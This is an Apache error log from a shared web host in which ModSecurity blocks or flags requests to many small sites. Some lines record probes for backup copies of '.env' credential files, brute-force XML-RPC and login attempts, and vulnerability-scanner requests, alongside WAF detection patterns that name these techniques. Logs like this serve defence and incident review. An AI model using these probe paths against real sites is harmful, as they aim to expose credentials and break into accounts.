[Tue May 26 12:49:48.456353 2026] [security2:error] [pid 448967:tid 449187] [client 208.84.100.229:25456] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.copy"] [unique_id "ahVJlOXLPuWQsfM-UVS1lwAAAFo"]
[Tue May 26 12:49:48.456420 2026] [security2:error] [pid 448967:tid 449154] [client 208.84.100.229:25358] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.production~"] [unique_id "ahVJlOXLPuWQsfM-UVS1mAAAADk"]
[Tue May 26 12:49:48.456870 2026] [security2:error] [pid 448967:tid 449212] [client 208.84.100.229:25550] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.production.bak"] [unique_id "ahVJlOXLPuWQsfM-UVS1jAAAAHM"]
[Tue May 26 12:49:48.457379 2026] [security2:error] [pid 448967:tid 449191] [client 208.84.100.229:25566] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.production.old"] [unique_id "ahVJlOXLPuWQsfM-UVS1ggAAAF4"]
[Tue May 26 12:49:49.697058 2026] [security2:error] [pid 448967:tid 449184] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJleXLPuWQsfM-UVS1qAAAAFc"]
[Tue May 26 12:49:53.073260 2026] [security2:error] [pid 448967:tid 449135] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJmOXLPuWQsfM-UVS1-wAAACY"]
[Tue May 26 12:49:56.022519 2026] [autoindex:error] [pid 448967:tid 449194] [client 43.250.164.247:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/gallery/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/gallery
[Tue May 26 12:49:56.040707 2026] [security2:error] [pid 448967:tid 449165] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJm-XLPuWQsfM-UVS2cQAAAEQ"]
[Tue May 26 12:49:56.101140 2026] [security2:error] [pid 448967:tid 449110] [client 157.20.138.61:50883] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJm-XLPuWQsfM-UVS2eQAAAA0"]
[Tue May 26 12:49:56.101278 2026] [security2:error] [pid 448967:tid 449110] [client 157.20.138.61:50883] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJm-XLPuWQsfM-UVS2eQAAAA0"]
[Tue May 26 12:49:58.680739 2026] [security2:error] [pid 448967:tid 449111] [client 74.249.173.207:40711] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/ioxi-o.php"] [unique_id "ahVJnuXLPuWQsfM-UVS23AAAAA4"]
[Tue May 26 12:49:58.774099 2026] [security2:error] [pid 448967:tid 449146] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJnuXLPuWQsfM-UVS2zwAAADE"]
[Tue May 26 12:50:00.142877 2026] [proxy:error] [pid 448967:tid 449133] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 12:50:00.142948 2026] [proxy_http:error] [pid 448967:tid 449133] [client 185.169.4.152:61359] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: binance.com
[Tue May 26 12:50:00.143535 2026] [proxy:error] [pid 448967:tid 449133] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 12:50:00.143570 2026] [proxy_http:error] [pid 448967:tid 449133] [client 185.169.4.152:61359] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: binance.com
[Tue May 26 12:50:00.766356 2026] [autoindex:error] [pid 448967:tid 449154] [client 43.166.244.192:0] AH01276: Cannot serve directory /home2/glorolle/public_html/aeromodellingconsultants.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://www.aeromodellingconsultants.com
[Tue May 26 12:50:01.726593 2026] [security2:error] [pid 448967:tid 449212] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJoeXLPuWQsfM-UVS3IgAAAHM"]
[Tue May 26 12:50:01.761114 2026] [security2:error] [pid 448967:tid 449098] [client 14.191.221.166:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJoeXLPuWQsfM-UVS3JQAAAAE"]
[Tue May 26 12:50:04.375039 2026] [security2:error] [pid 448967:tid 449151] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJo-XLPuWQsfM-UVS3awAAADY"]
[Tue May 26 12:50:05.837310 2026] [security2:error] [pid 448967:tid 449173] [client 66.249.82.96:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVJpOXLPuWQsfM-UVS3dAAAAEw"]
[Tue May 26 12:50:06.565100 2026] [security2:error] [pid 448967:tid 449167] [client 157.20.138.61:51231] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJpuXLPuWQsfM-UVS3twAAAEY"]
[Tue May 26 12:50:06.565275 2026] [security2:error] [pid 448967:tid 449167] [client 157.20.138.61:51231] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJpuXLPuWQsfM-UVS3twAAAEY"]
[Tue May 26 12:50:07.233463 2026] [security2:error] [pid 448967:tid 449150] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJpuXLPuWQsfM-UVS3vwAAADU"]
[Tue May 26 12:50:09.450255 2026] [security2:error] [pid 448967:tid 449127] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJqeXLPuWQsfM-UVS3-QAAAB4"]
[Tue May 26 12:50:11.441656 2026] [autoindex:error] [pid 448967:tid 449102] [client 20.17.176.186:56878] AH01276: Cannot serve directory /home2/svijakqj/operatives.org.in/.well-known/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 12:50:13.087803 2026] [security2:error] [pid 448967:tid 449182] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJrOXLPuWQsfM-UVS4WAAAAFU"]
[Tue May 26 12:50:13.702463 2026] [security2:error] [pid 448967:tid 449179] [client 178.20.43.173:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVJreXLPuWQsfM-UVS4eQAAAFI"], referer: http://anujtradingco.com/homepages/shop-parallax/
[Tue May 26 12:50:13.730413 2026] [security2:error] [pid 448967:tid 449017] [remote 92.117.185.70:60518] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 70.185.117.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahVJreXLPuWQsfM-UVS4cwAAFjE"]
[Tue May 26 12:50:14.931564 2026] [security2:error] [pid 448967:tid 449121] [client 70.37.27.114:0] ModSecurity: Warning. Matched phrase "Claritybot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.yourstorybag.com"] [uri "/wp-content/cache/wp-rocket/www.yourstorybag.com/index-https.html_gzip"] [unique_id "ahVJruXLPuWQsfM-UVS4oAAAABg"]
[Tue May 26 12:50:14.932859 2026] [security2:error] [pid 448967:tid 449208] [client 70.37.27.114:31723] ModSecurity: Warning. Matched phrase "Claritybot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.yourstorybag.com"] [uri "/"] [unique_id "ahVJruXLPuWQsfM-UVS4ngAAAG8"]
[Tue May 26 12:50:15.459712 2026] [security2:error] [pid 448967:tid 449073] [remote 74.7.241.58:43640] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVJr-XLPuWQsfM-UVS4rQAAK2k"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/templates/sysinfo/tabs
[Tue May 26 12:50:15.764614 2026] [security2:error] [pid 448967:tid 449193] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJr-XLPuWQsfM-UVS4qQAAAGA"]
[Tue May 26 12:50:17.015477 2026] [security2:error] [pid 448967:tid 449143] [client 157.20.138.61:51592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJseXLPuWQsfM-UVS41wAAAC4"]
[Tue May 26 12:50:17.015594 2026] [security2:error] [pid 448967:tid 449143] [client 157.20.138.61:51592] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJseXLPuWQsfM-UVS41wAAAC4"]
[Tue May 26 12:50:18.908885 2026] [security2:error] [pid 448967:tid 449173] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJsuXLPuWQsfM-UVS4_wAAAEw"]
[Tue May 26 12:50:21.740936 2026] [security2:error] [pid 448967:tid 449099] [client 66.249.64.171:61683] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVJtOXLPuWQsfM-UVS5PgAAAAI"], referer: https://doyecpa.com/prizes/47689460
[Tue May 26 12:50:22.429259 2026] [security2:error] [pid 448967:tid 449172] [client 110.177.177.77:12616] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "obinnawrites.com"] [uri "/"] [unique_id "ahVJtuXLPuWQsfM-UVS5bAAAAEs"]
[Tue May 26 12:50:22.581606 2026] [security2:error] [pid 448967:tid 449163] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJtuXLPuWQsfM-UVS5YQAAAEI"]
[Tue May 26 12:50:24.078325 2026] [security2:error] [pid 448967:tid 449199] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJt-XLPuWQsfM-UVS5iQAAAGY"]
[Tue May 26 12:50:24.245739 2026] [autoindex:error] [pid 448967:tid 449154] [client 15.204.183.221:0] AH01276: Cannot serve directory /home2/glorolle/public_html/gldmarsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://gldmarsa.com/
[Tue May 26 12:50:26.534449 2026] [autoindex:error] [pid 448967:tid 449204] [client 15.204.183.221:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://glorodbalsa.com/
[Tue May 26 12:50:26.561137 2026] [security2:error] [pid 448967:tid 449111] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJuuXLPuWQsfM-UVS5ygAAAA4"]
[Tue May 26 12:50:27.687460 2026] [security2:error] [pid 448967:tid 449187] [client 14.169.232.74:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJu-XLPuWQsfM-UVS56QAAAFo"]
[Tue May 26 12:50:28.691200 2026] [security2:error] [pid 448967:tid 449208] [client 157.20.138.61:51967] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJvOXLPuWQsfM-UVS6DAAAAG8"]
[Tue May 26 12:50:28.691323 2026] [security2:error] [pid 448967:tid 449208] [client 157.20.138.61:51967] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJvOXLPuWQsfM-UVS6DAAAAG8"]
[Tue May 26 12:50:29.167695 2026] [security2:error] [pid 448967:tid 449172] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJvOXLPuWQsfM-UVS6FQAAAEs"]
[Tue May 26 12:50:30.365895 2026] [security2:error] [pid 448967:tid 448986] [remote 57.141.2.39:58099] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 39.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVJvuXLPuWQsfM-UVS6QQAAZhI"]
[Tue May 26 12:50:32.914309 2026] [security2:error] [pid 448967:tid 449207] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJwOXLPuWQsfM-UVS6fgAAAG4"]
[Tue May 26 12:50:34.836167 2026] [security2:error] [pid 448967:tid 449170] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJwuXLPuWQsfM-UVS6ugAAAEk"]
[Tue May 26 12:50:37.766416 2026] [security2:error] [pid 448967:tid 449160] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJxeXLPuWQsfM-UVS7DwAAAD8"]
[Tue May 26 12:50:39.143303 2026] [security2:error] [pid 448967:tid 449197] [client 157.20.138.61:52328] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJx-XLPuWQsfM-UVS7PAAAAGQ"]
[Tue May 26 12:50:39.143412 2026] [security2:error] [pid 448967:tid 449197] [client 157.20.138.61:52328] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJx-XLPuWQsfM-UVS7PAAAAGQ"]
[Tue May 26 12:50:39.867055 2026] [proxy:error] [pid 448967:tid 449183] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 12:50:39.867124 2026] [proxy_http:error] [pid 448967:tid 449183] [client 205.210.31.131:61018] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 12:50:39.867769 2026] [proxy:error] [pid 448967:tid 449183] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 12:50:39.867813 2026] [proxy_http:error] [pid 448967:tid 449183] [client 205.210.31.131:61018] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 12:50:41.193301 2026] [security2:error] [pid 448967:tid 449148] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJyOXLPuWQsfM-UVS7cQAAADM"]
[Tue May 26 12:50:43.512151 2026] [security2:error] [pid 448967:tid 449140] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJy-XLPuWQsfM-UVS7pAAAACs"]
[Tue May 26 12:50:43.857142 2026] [security2:error] [pid 448967:tid 449207] [client 139.180.224.202:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVJy-XLPuWQsfM-UVS7uQAAAG4"], referer: https://anujtradingco.com
[Tue May 26 12:50:46.713504 2026] [security2:error] [pid 448967:tid 449195] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJzuXLPuWQsfM-UVS8LwAAAGI"]
[Tue May 26 12:50:48.807867 2026] [autoindex:error] [pid 448967:tid 449134] [client 185.217.125.16:55584] AH01276: Cannot serve directory /home1/moesartc/public_html/preetishah.com/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 12:50:49.439164 2026] [security2:error] [pid 448967:tid 449125] [client 85.208.96.206:30126] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/fun/list/"] [unique_id "ahVJ0eXLPuWQsfM-UVS8oAAAABw"]
[Tue May 26 12:50:49.439309 2026] [security2:error] [pid 448967:tid 449125] [client 85.208.96.206:30126] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/fun/list/"] [unique_id "ahVJ0eXLPuWQsfM-UVS8oAAAABw"]
[Tue May 26 12:50:49.533890 2026] [security2:error] [pid 448967:tid 449203] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ0eXLPuWQsfM-UVS8kgAAAGo"]
[Tue May 26 12:50:49.644724 2026] [security2:error] [pid 448967:tid 449114] [client 157.20.138.61:52687] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJ0eXLPuWQsfM-UVS8qAAAABE"]
[Tue May 26 12:50:49.644875 2026] [security2:error] [pid 448967:tid 449114] [client 157.20.138.61:52687] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJ0eXLPuWQsfM-UVS8qAAAABE"]
[Tue May 26 12:50:52.413029 2026] [security2:error] [pid 448967:tid 449151] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ0-XLPuWQsfM-UVS87gAAADY"]
[Tue May 26 12:50:54.030252 2026] [security2:error] [pid 448967:tid 449137] [client 184.189.77.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ1eXLPuWQsfM-UVS9HQAAACg"]
